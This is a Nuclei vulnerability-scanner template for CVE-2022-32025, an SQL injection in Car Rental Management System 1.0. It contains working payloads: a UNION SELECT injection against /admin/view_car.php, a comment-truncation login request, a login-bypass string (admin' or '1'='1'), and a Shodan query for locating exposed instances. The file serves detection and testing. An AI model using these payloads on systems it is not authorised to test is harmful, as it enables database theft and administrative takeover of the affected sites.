nuclei-templates/cves/2022/CVE-2022-32025.yaml

55 lines
1.7 KiB
YAML

id: CVE-2022-32025
info:
name: Car Rental Management System 1.0 - SQL Injection
author: arafatansari
severity: high
description: |
Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-32025
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-32025
cwe-id: CWE-89
metadata:
comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
shodan-query: http.html:"Car Rental Management System"
verified: "true"
tags: cve,cve2022,carrental,cms,sqli,authenticated
variables:
num: "999999999"
requests:
- raw:
- |
POST /admin/ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}%23&password={{password}}
- |
GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1
Host: {{Hostname}}
skip-variables-check: true
host-redirects: true
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
- type: status
status:
- 200
# Enhanced by md on 2022/09/26